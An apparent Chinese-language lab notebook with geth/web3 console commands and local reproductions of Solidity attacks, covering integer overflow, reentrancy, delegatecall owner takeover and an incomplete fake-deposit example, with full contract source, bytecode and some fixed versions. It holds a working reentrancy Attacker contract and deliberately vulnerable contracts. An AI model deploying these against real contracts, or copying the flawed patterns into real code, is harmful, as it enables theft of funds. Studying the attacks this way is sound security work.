代码编织梦想

常用web3指令

添加新账户

personal.newAccount()

查询账户余额

(以ether为单位显示,可查合约账户):web3.fromWei(eth.getBalance(“0xfe44108f962ae9afa23699b5b7f1fa817e5b5012”),“ether”)

定义变量

var acc0=eth.accounts[0]

解锁账户

(dev模式下除了开发者账户account[0],其他账户每次使用都需要解锁一次):personal.unlockAccount(eth.accounts[1])

转账

(acc为提前定义好的变量,如果没有定义,也可以直接放地址,地址需加前后英文双引号):eth.sendTransaction({from:acc0 , to:acc1,value: web3.toWei(‘100’, ‘ether’)})

设置当前调用函数的账户

web3.eth.defaultAccount = web3.eth.accounts[0]

调用函数

调用sendTransaction类型函数的方法

(调用时不需要发送msg.value的话直接去掉value选项就好):

合约名.函数名.sendTransaction(参数列表,{from: “0xde04aeaf51781f55353ccf6511c3c82ec43bd2bb”, value: web3.toWei(‘10’, ‘ether’)})

(需要付gas的,由from:的账户付gas)

调用call类型函数的方法

合约名.函数名.call(参数列表)

账户可一直保存,在keystore文件里,其中accounts[0]是开发者账户,以太币余额无限多

账户地址

//以下为我自己的两个账户文件,方便复制粘贴

attack1数据文件:

eth.accounts[“0x2378f0b099a2c18ff2157aa9f96c5617b0241168”,

“0x910d3a7564d50311e4cdbd11bc8d9068aa9ec2f9”,

“0x5f3d8493dfce07d413bf56e3fb295116ac24cb88”,

“0x044a672165513e4a19b781acb95563d8377e7206”]

attack2数据文件:

eth.accounts

[“0xfe44108f962ae9afa23699b5b7f1fa817e5b5012”,

“0xf1837bfdfcc5be3a63e5b899cd54b69950009b07”]

attack3数据文件:

eth.accounts
[“0xb14c4c98d7adf099f940fea652955c3c9d3de021”,

“0xde04aeaf51781f55353ccf6511c3c82ec43bd2bb”]

启动geth

需要添加环境变量到/etc/profile文件末尾(路径是自己安装go-ethereum的路径下的/build/bin,我是安装在/home下的)

export PATH=$PATH:/home/go-ethereum/build/bin

geth开启开发者模式(dev模式,无需genesis.json,直接一行命令启动,在需要的时候瞬间自动出块,做实验很方便,–datadir后是数据文件存放地,建议自己新建一个,>后是log文件)

geth --datadir ./crosschain_datadir --dev console 2>output.log

可开启另一终端执行 tail -f output.log查看log 不影响做实验

几个攻击复现

整数溢出

pragma solidity ^0.4.22;
contract POC{
    function add_overflow() returns (uint256 _overflow){
        uint256 max = 2**256-1;
        return max+1;
    }
     function sub_underflow() returns (uint256 _underflow){
        uint256 min=0;
        return min-1;
    }
     function mul_overflow() returns (uint256 _overflow){
        uint256 mul= 2**255;
        return mul*2;
    }
}

合约部署方法

部署方法1

(建议采用方法1,方法2麻烦而且有点问题):

将Remix里的WEB3DEPLOY粘贴到geth console回车执行

注意事项如下:
在这里插入图片描述

new删除,C小写,deploy改为new,第四个红框内容删掉

处理完格式如下:

var pocContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"_underflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var poc = pocContract.new({
     data: '0x608060405234801561001057600080fd5b5061017a806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063656781711461005c578063df541bdb14610087578063eb67eaa7146100b2575b600080fd5b34801561006857600080fd5b506100716100dd565b6040518082815260200191505060405180910390f35b34801561009357600080fd5b5061009c6100ee565b6040518082815260200191505060405180910390f35b3480156100be57600080fd5b506100c761011e565b6040518082815260200191505060405180910390f35b600080600090506001810391505090565b6000807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff90506001810191505090565b6000807f8000000000000000000000000000000000000000000000000000000000000000905060028102915050905600a165627a7a723058200122e17839720f0ff44791ef902738f9cfb738a12e01cfe7c41ee0591c2fa9db0029', 
     
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

poc即为合约实例名,可直接poc.function.call()和poc.function.sendTransaction()调用合约里的public函数

部署方法2

Remix获取ABI与Bytecode,复制下来的ABI先要转成JSON字符串,我们可以借助http://www.bejson.com/jsonviewernew/来完成

abi=[{“constant”:false,“inputs”:[],“name”:“add_overflow”,“outputs”:[{“name”:“_overflow”,“type”:“uint256”}],“payable”:false,“stateMutability”:“nonpayable”,“type”:“function”},{“constant”:false,“inputs”:[],“name”:“mul_overflow”,“outputs”:[{“name”:“_overflow”,“type”:“uint256”}],“payable”:false,“stateMutability”:“nonpayable”,“type”:“function”},{“constant”:false,“inputs”:[],“name”:“sub_underflow”,“outputs”:[{“name”:“_underflow”,“type”:“uint256”}],“payable”:false,“stateMutability”:“nonpayable”,“type”:“function”}]

bytecode只取object并在开头加0x,和前后双引号

如bytecode=“0x608060405234801561001057600080fd5b5061017a806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063656781711461005c578063df541bdb14610087578063eb67eaa7146100b2575b600080fd5b34801561006857600080fd5b506100716100dd565b6040518082815260200191505060405180910390f35b34801561009357600080fd5b5061009c6100ee565b6040518082815260200191505060405180910390f35b3480156100be57600080fd5b506100c761011e565b6040518082815260200191505060405180910390f35b600080600090506001810391505090565b6000807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff90506001810191505090565b6000807f8000000000000000000000000000000000000000000000000000000000000000905060028102915050905600a165627a7a72305820d975a068c2325dff8d7edba9b606edab44e133fecaa0fe1792ebf57070f4d9450029”

contract = eth.contract(abi);
eth.estimateGas({data: bytecode})//预估gas费
initializer = {from: web3.eth.accounts[0], data: bytecode, gas: 140000};//gas取比预估出来的大一些就行
token = contract.new(initializer)//token即为合约实例,可以直接调用合约里的函数
web3.eth.defaultAccount = web3.eth.accounts[0]	//初始化设置,dev模式不需要

mycontract = contract.at(token.address)	//上链后可直接使用token进行合约调用,但重启geth后需用此语句重新实例化。

mycontract.function()	//调用

防护:

pragma solidity ^0.4.22;
contract POC{

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522
        if (a == 0) {
            return 0;
        }
 
        uint256 c = a * b;
        require(c / a == b);
 
        return c;
    }
 
    /**
     * @dev Integer division of two unsigned integers truncating the quotient, reverts on division by zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
 
        return c;
    }
 
    /**
     * @dev Subtracts two unsigned integers, reverts on overflow (i.e. if subtrahend is greater than minuend).
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a);
        uint256 c = a - b;
 
        return c;
    }
 
    /**
     * @dev Adds two unsigned integers, reverts on overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a);
 
        return c;
    }
 
    /**
     * @dev Divides two unsigned integers and returns the remainder (unsigned integer modulo),
     * reverts when dividing by zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b != 0);
        return a % b;
    }
    uint256 a;

    function add_overflow() returns (uint256 a){
        uint256 max = 2**256-1;
        return add(max,1);
    }
     function sub_underflow() returns (uint256 b){
        uint256 min=0;
        return sub(min,1);
    }
     function mul_overflow() returns (uint256 c){
        uint256 mulamount= 2**255;
        return mul(mulamount,2);
    }
}
var pocContract =web3.eth.contract([{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"b","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"a","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"c","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var poc = pocContract.new({
     data: '0x608060405234801561001057600080fd5b5061020f806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063656781711461005c578063df541bdb14610087578063eb67eaa7146100b2575b600080fd5b34801561006857600080fd5b506100716100dd565b6040518082815260200191505060405180910390f35b34801561009357600080fd5b5061009c6100f5565b6040518082815260200191505060405180910390f35b3480156100be57600080fd5b506100c761012c565b6040518082815260200191505060405180910390f35b600080600090506100ef816001610163565b91505090565b6000807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9050610126816001610184565b91505090565b6000807f8000000000000000000000000000000000000000000000000000000000000000905061015d8160026101a5565b91505090565b60008083831115151561017557600080fd5b82840390508091505092915050565b600080828401905083811015151561019b57600080fd5b8091505092915050565b60008060008414156101ba57600091506101dc565b82840290508284828115156101cb57fe5b041415156101d857600080fd5b8091505b50929150505600a165627a7a723058207f4a52a857f643b644c7648069e5343fe42425f1af7e81060719cde23d4072990029', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

重入攻击

pragma solidity ^0.4.19;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            msg.sender.call.value(amount)();
            userBalannce[msg.sender] = 0;
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;
    function Attacker() payable{}
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){
        Victim(addr).withDraw();
    }
}

部署合约时的部署账户

即为from: web3.eth.accounts[0]处的账户,如果是accounts[0]之外的账户,则需要先解锁一次再部署

var victimContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"withDraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"receiveEther","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"userBalannce","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var victim = victimContract.new({
     data: '0x606060405260006001556102d1806100186000396000f30060606040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680630fdb1c101461006f578063a3912ec814610084578063a657bbcc1461008e578063aa8c217c146100b7578063c30f76a6146100e0575b005b341561007a57600080fd5b61008261012d565b005b61008c6101f2565b005b341561009957600080fd5b6100a161024a565b6040518082815260200191505060405180910390f35b34156100c257600080fd5b6100ca610287565b6040518082815260200191505060405180910390f35b34156100eb57600080fd5b610117600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190505061028d565b6040518082815260200191505060405180910390f35b60008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008111156101ef573373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185876187965a03f1925050505060008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b600034111561024857346000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b565b60003073ffffffffffffffffffffffffffffffffffffffff16316001819055503073ffffffffffffffffffffffffffffffffffffffff1631905090565b60015481565b600060205280600052604060002060009150905054815600a165627a7a72305820f1e75a84b04036d1d187bf80017a92183e9104b5a2f01fa9ba1baee661d5693a0029', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
 

Contract mined! address: 0x58c4688b17b24831103a25344f01812f62e711bd transactionHash: 0x5ee74325304fc8c7688a8504ba774524d382bbbec15033a3677332b0cd0e0701

第二个合约Attacker:

var attackerContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"sendMoney","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"reentry","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"test","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var attacker = attackerContract.new({
     data: '0x60606040526000805560006001556103578061001c6000396000f30060606040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063338ccd78146100f85780633c04ec3314610131578063a657bbcc1461016a578063aa8c217c14610193578063f8a8fd6d146101bc575b6001600081548092919060010191905055503373ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156100e257600080fd5b6102c65a03f115156100f357600080fd5b505050005b341561010357600080fd5b61012f600480803573ffffffffffffffffffffffffffffffffffffffff169060200190919050506101e5565b005b341561013c57600080fd5b610168600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610268565b005b341561017557600080fd5b61017d6102e2565b6040518082815260200191505060405180910390f35b341561019e57600080fd5b6101a661031f565b6040518082815260200191505060405180910390f35b34156101c757600080fd5b6101cf610325565b6040518082815260200191505060405180910390f35b8073ffffffffffffffffffffffffffffffffffffffff1663a3912ec8670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b151561025057600080fd5b6125ee5a03f1151561026157600080fd5b5050505050565b8073ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156102cb57600080fd5b6102c65a03f115156102dc57600080fd5b50505050565b60003073ffffffffffffffffffffffffffffffffffffffff16316000819055503073ffffffffffffffffffffffffffffffffffffffff1631905090565b60005481565b600154815600a165627a7a72305820753a8a0e16fb81fadedc67369e096e1105f147c5cdf7524a296c9b9fc5946bc40029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:10000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xc852dadfa72c66c479d3b45672bb7cd50bbad658 transactionHash: 0xb348fd2e63bebfac65e7494cda20ebaf28fe4dc445898694dd7b3e187251a1f0

防护:

pragma solidity ^0.4.19;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            
            userBalannce[msg.sender] = 0;
            msg.sender.call.value(amount)();
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;
    function Attacker() payable{}
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){
        Victim(addr).withDraw();
    }
}

var victimContract = web3.eth.contract([{"constant":false,"inputs":[],"name":"withDraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"receiveEther","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"userBalannce","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var victim = victimContract.new({
     data: '0x606060405260006001556102d1806100186000396000f30060606040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680630fdb1c101461006f578063a3912ec814610084578063a657bbcc1461008e578063aa8c217c146100b7578063c30f76a6146100e0575b005b341561007a57600080fd5b61008261012d565b005b61008c6101f2565b005b341561009957600080fd5b6100a161024a565b6040518082815260200191505060405180910390f35b34156100c257600080fd5b6100ca610287565b6040518082815260200191505060405180910390f35b34156100eb57600080fd5b610117600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190505061028d565b6040518082815260200191505060405180910390f35b60008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008111156101ef5760008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185876187965a03f192505050505b50565b600034111561024857346000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b565b60003073ffffffffffffffffffffffffffffffffffffffff16316001819055503073ffffffffffffffffffffffffffffffffffffffff1631905090565b60015481565b600060205280600052604060002060009150905054815600a165627a7a7230582083520b9aa083b8c447a87d1578798f789b47a05589db7d6d54a27daf3928e95c0029', 
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:25000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xafe0d2de59b350c1ae67b3238f9697c6be32275e transactionHash: 0x3fa4e24bfc1510ae78d029ebf628524ceb313688c9262bb7c69b69480001e367

var attackerContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"sendMoney","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"reentry","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"test","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var attacker = attackerContract.new({
     data: '0x60606040526000805560006001556103578061001c6000396000f30060606040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063338ccd78146100f85780633c04ec3314610131578063a657bbcc1461016a578063aa8c217c14610193578063f8a8fd6d146101bc575b6001600081548092919060010191905055503373ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156100e257600080fd5b6102c65a03f115156100f357600080fd5b505050005b341561010357600080fd5b61012f600480803573ffffffffffffffffffffffffffffffffffffffff169060200190919050506101e5565b005b341561013c57600080fd5b610168600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610268565b005b341561017557600080fd5b61017d6102e2565b6040518082815260200191505060405180910390f35b341561019e57600080fd5b6101a661031f565b6040518082815260200191505060405180910390f35b34156101c757600080fd5b6101cf610325565b6040518082815260200191505060405180910390f35b8073ffffffffffffffffffffffffffffffffffffffff1663a3912ec8670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b151561025057600080fd5b6125ee5a03f1151561026157600080fd5b5050505050565b8073ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156102cb57600080fd5b6102c65a03f115156102dc57600080fd5b50505050565b60003073ffffffffffffffffffffffffffffffffffffffff16316000819055503073ffffffffffffffffffffffffffffffffffffffff1631905090565b60005481565b600154815600a165627a7a723058209b92242a801d86ca4f2593daa27cbe5c9245f95aa5ec9edb34ebc96460ddca600029', 
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

delegatecall漏洞

pragma solidity ^0.4.10;
contract Delegate {
    address public owner;
    function Delegate(address _owner) {
        owner = _owner;
    }
    function setOwner() {
        owner = msg.sender;
    }
}
contract Delegation {
    address public owner;
    Delegate delegate;
    function Delegation(address _delegateAddress) {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }
    function () {
        if (delegate.delegatecall(bytes4(keccak256("setOwner()")))) {
            this;
        }
    }
}

第一个合约Delegate:

部署合约时构造函数参数处理方法

在WEB3DEPLOY中的前几行填入对应参数,并在contract.new(下面第3行)后面的({这两个括号之间放入定义的变量列表,以逗号分隔且最后要有个逗号,注意变量定义时address类型需加前后英文双引号

var _owner = "0x2378f0b099a2c18ff2157aa9f96c5617b0241168" ;
var delegateContract = web3.eth.contract([{"constant":false,"inputs":[],"name":"setOwner","outputs":[],"payable":false,"type":"function","stateMutability":"nonpayable"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_owner","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var delegate = delegateContract.new(_owner,
{
     data: '0x6060604052341561000c57fe5b6040516020806101bc833981016040528080519060200190919050505b80600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101408061007c6000396000f30060606040526000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806340caae06146100465780638da5cb5b14610058575bfe5b341561004e57fe5b6100566100aa565b005b341561006057fe5b6100686100ee565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b33600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b565b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16815600a165627a7a723058207a55306717c1e8cc5fa91b9d9796fd332c150849ad0f7500db1b515f71458cfd0029', 
          
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x289c5b897c0b30f4962d3e39c1b8ef62dfd7b4f8 transactionHash: 0x65bb9d9488fde84f6ae526a926af64dcaf6e055f591d1dc092abfe69e701a336

第二个合约Delegation:

var _delegateAddress = "0x289c5b897c0b30f4962d3e39c1b8ef62dfd7b4f8" ;
var delegationContract = web3.eth.contract([{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":false,"inputs":[],"name":"attack","outputs":[],"payable":false,"type":"function","stateMutability":"nonpayable"},{"inputs":[{"name":"_delegateAddress","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var delegation = delegationContract.new( _delegateAddress,
{
     data: '0x6060604052341561000c57fe5b6040516020806102a8833981016040528080519060200190919050505b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555033600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101eb806100bd6000396000f30060606040526000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680638da5cb5b146100465780639e5faafc14610098575bfe5b341561004e57fe5b6100566100aa565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34156100a057fe5b6100a86100d0565b005b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660405180807f7365744f776e6572282900000000000000000000000000000000000000000000815250600a01905060405180910390207c010000000000000000000000000000000000000000000000000000000090046000604051602001526040518163ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004018090506020604051808303818660325a03f415156101b057fe5b50505060405180519050505b5b5600a165627a7a723058203203659275a49e3debea039b634c653a12f584dc1cff9aff3872b7be66b156830029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
 
 var _delegateAddress = 0x06e1b0366ea9d22731d03e2dfffbdbcfca2796d6 ;
var delegationContract =  web3.eth.contract([{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_delegateAddress","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"},{"payable":false,"type":"fallback","stateMutability":"nonpayable"}]);
var delegation = delegationContract.new(
_delegateAddress,{
     data: '0x6060604052341561000c57fe5b60405160208061029d833981016040528080519060200190919050505b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555033600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101e0806100bd6000396000f3006060604052361561003f576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680638da5cb5b1461013c575b341561004757fe5b61013a5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660405180807f7365744f776e6572282900000000000000000000000000000000000000000000815250600a01905060405180910390207c010000000000000000000000000000000000000000000000000000000090046000604051602001526040518163ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004018090506020604051808303818660325a03f4151561012b57fe5b50505060405180519050505b5b565b005b341561014457fe5b61014c61018e565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16815600a165627a7a72305820d6b31560aaabb2281f6c60ab7aad2f19587c00e7225ec7cb71be82da7f6b96b70029', 

     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xd1115e35e29b3c14e2a4091aa16026eeb19995ca transactionHash: 0xd12bccb652b818fcd3b68e34c3b7aa20a3a321be5aa16d9ebde0bb6f3d1123ea

假充值漏洞

pragma solidity ^0.4.22;

contract token1{
address owner;
uint public amount = 0;
function token1() payable {}
function() payable {}
mapping (address => uint256) balance;
function deposit1() payable {balance[msg.sender] += msg.value; }
function deposit2() payable {balance[this] += msg.value; }
function transfer(address _to, uint256 _value) public returns (bool) {
    if(_value <= balances[msg.sender] && _value > 0){
      balances[msg.sender] -= _value;
      balances[_to] += _value;
      return true;
    }
    else
        return false;
  }
}

var token1Contract = web3.eth.contract([{"constant":false,"inputs":[],"name":"deposit2","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":false,"type":"function","stateMutability":"nonpayable"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":false,"inputs":[],"name":"deposit1","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"payable":true,"type":"fallback","stateMutability":"payable"}]);
var token1 = token1Contract.new({
